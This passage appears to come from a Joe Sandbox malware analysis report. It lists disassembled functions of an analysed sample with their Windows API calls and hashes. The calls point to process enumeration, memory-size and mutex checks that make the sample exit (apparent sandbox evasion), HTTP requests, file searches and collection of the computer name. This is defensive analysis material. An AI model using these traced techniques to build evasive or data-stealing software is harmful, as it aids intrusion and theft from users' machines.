Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: c7e862fccb32f26e7f8ee098ed8dd0a8a706721e1b606ff8754937ddeb564fc7
Instruction ID: a5ca0690532b0d4d1071f45a0be1c8492cb4a38c9ae2238b6e907410dd88c101
Opcode Fuzzy Hash: c7e862fccb32f26e7f8ee098ed8dd0a8a706721e1b606ff8754937ddeb564fc7
Instruction Fuzzy Hash: 88315171901618ABCB2ADF54DC85FEEB778EF45700F108199F10EA6190DF386A49CFA2

Function 00376AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01149098,?,0038110C,?,00000000,?,00381110,?,00000000,00380AEF), ref: 00376ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00376AE8
CloseHandle.KERNEL32(00000000), ref: 00376AF9
Sleep.KERNEL32(00001770), ref: 00376B04
CloseHandle.KERNEL32(?,00000000,?,01149098,?,0038110C,?,00000000,?,00381110,?,00000000,00380AEF), ref: 00376B1A
ExitProcess.KERNEL32 ref: 00376B22

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 04643baa7753e8ad07c996f37b90f306aabd85cf1b4b034309b17dcd6843146e
Instruction ID: 42529b4ca7668852d696459fbdfc4fcf1a89b960033bccb5e732e421068f1621
Opcode Fuzzy Hash: 04643baa7753e8ad07c996f37b90f306aabd85cf1b4b034309b17dcd6843146e
Instruction Fuzzy Hash: 27F0E270904A09EFE7A2ABA0CC27BBE7B38FF15300F10C414F50BA50C0CBB85504EA62

Function 003647B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00364849

Strings

<, xrefs: 003647C9

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: a5271b80a6a612f37ebccb577c3113adc3840d6e4720f494a5bd63a6bdc0333e
Instruction ID: 47063f28a4eb008e206b2a1119c66586db156379bbb2294f208e650a9b79dc40
Opcode Fuzzy Hash: a5271b80a6a612f37ebccb577c3113adc3840d6e4720f494a5bd63a6bdc0333e
Instruction Fuzzy Hash: C52142B1D00209ABDF14DFA4E845ADE7B74FB45310F108625F519AB2C1DB706605CF91

Function 003751F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 00366280: InternetOpenA.WININET(00380DFE,00000001,00000000,00000000,00000000), ref: 003662E1
Part of subcall function 00366280: StrCmpCA.SHLWAPI(?,0114EBA8), ref: 00366303
Part of subcall function 00366280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366335
Part of subcall function 00366280: HttpOpenRequestA.WININET(00000000,GET,?,0114DEE0,00000000,00000000,00400100,00000000), ref: 00366385
Part of subcall function 00366280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003663BF
Part of subcall function 00366280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003663D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375228

Strings

ERROR, xrefs: 0037521A
ERROR, xrefs: 00375273

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 25348af8381f21329c68d7f6c3b4cc38710a155af7fa04d241288b7a6bd4e64c
Instruction ID: 2173efa3e730ce6adbea1077a1e40c83dc9592e009413a54f0e5199412c14f6c
Opcode Fuzzy Hash: 25348af8381f21329c68d7f6c3b4cc38710a155af7fa04d241288b7a6bd4e64c
Instruction Fuzzy Hash: 8E114F30800548A6CB2AFF64DC52AED7738AF90300F40C568F81E4E492EF386B06CB92

Function 00361220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0036123E
ExitProcess.KERNEL32 ref: 00361294

Strings

@, xrefs: 00361233

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: 54668463511d6bc85a1f601ce47726124b4ce1399d04a4ccada1f18a1b70a7c2
Instruction ID: 96bd1ad96af18296a1aa2a99cea214b176a0921c8cee56d0957a838908da5d9e
Opcode Fuzzy Hash: 54668463511d6bc85a1f601ce47726124b4ce1399d04a4ccada1f18a1b70a7c2
Instruction Fuzzy Hash: E8016DB0D40308BAEB51DBE4DC49BAEBB78BF14701F24C858F705BA2C4D7B855458B99

Function 00374F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00378DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378E0B

lstrcat.KERNEL32(?,00000000), ref: 00374F7A
lstrcat.KERNEL32(?,00381070), ref: 00374F97
lstrcat.KERNEL32(?,01149178), ref: 00374FAB
lstrcat.KERNEL32(?,00381074), ref: 00374FBD

Part of subcall function 00374910: wsprintfA.USER32 ref: 0037492C
Part of subcall function 00374910: FindFirstFileA.KERNEL32(?,?), ref: 00374943

Part of subcall function 00374910: StrCmpCA.SHLWAPI(?,00380FDC), ref: 00374971
Part of subcall function 00374910: StrCmpCA.SHLWAPI(?,00380FE0), ref: 00374987
Part of subcall function 00374910: FindNextFileA.KERNEL32(000000FF,?), ref: 00374B7D
Part of subcall function 00374910: FindClose.KERNEL32(000000FF), ref: 00374B92

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 0281141a6ca9b58e730aba0e8a7936f5da09424b6731da0604889aa0cbc20ef2
Instruction ID: ef51d862b6b42ceeaf5a69e441d4c604e8b8e468411585efc0f56e13291c8431
Opcode Fuzzy Hash: 0281141a6ca9b58e730aba0e8a7936f5da09424b6731da0604889aa0cbc20ef2
Instruction Fuzzy Hash: E721DD7690020867CBA5FB70DC46EED733CAB55300F008594B75A96185EF789ACDDB92

Function 00370740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,011491F8), ref: 0037079A
StrCmpCA.SHLWAPI(00000000,011492A8), ref: 00370866
StrCmpCA.SHLWAPI(00000000,01149108), ref: 0037099D

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1ed6ec463dc09c9debd7b6198c67ae873d83f99a800b50c7922a8976325221d5
Instruction ID: f200c0428ce4148a19c4cc3d076033ab6e086b1401928e1a187a44951326799f
Opcode Fuzzy Hash: 1ed6ec463dc09c9debd7b6198c67ae873d83f99a800b50c7922a8976325221d5
Instruction Fuzzy Hash: 61918875A102489FCB29EF64D991BEDB7B5FF95300F40C519E80E9F245DB349A09CB82

Function 00370765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,011491F8), ref: 0037079A
StrCmpCA.SHLWAPI(00000000,011492A8), ref: 00370866
StrCmpCA.SHLWAPI(00000000,01149108), ref: 0037099D

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: fd2bf171e619dd0336771f194bd8e30068d4a70c0824bc63626fe80092307534
Instruction ID: a9c5957920601bd54477ad047507dc0aeea93bf5bd7ab8038d3103ac29d008c9
Opcode Fuzzy Hash: fd2bf171e619dd0336771f194bd8e30068d4a70c0824bc63626fe80092307534
Instruction Fuzzy Hash: 61819675B102489FCB2DEF64C991AEDB7B5FF95300F10C519E8099F245DB34AA06CB82

Function 003778E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377910
RtlAllocateHeap.NTDLL(00000000), ref: 00377917
GetComputerNameA.KERNEL32(?,00000104), ref: 0037792F

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
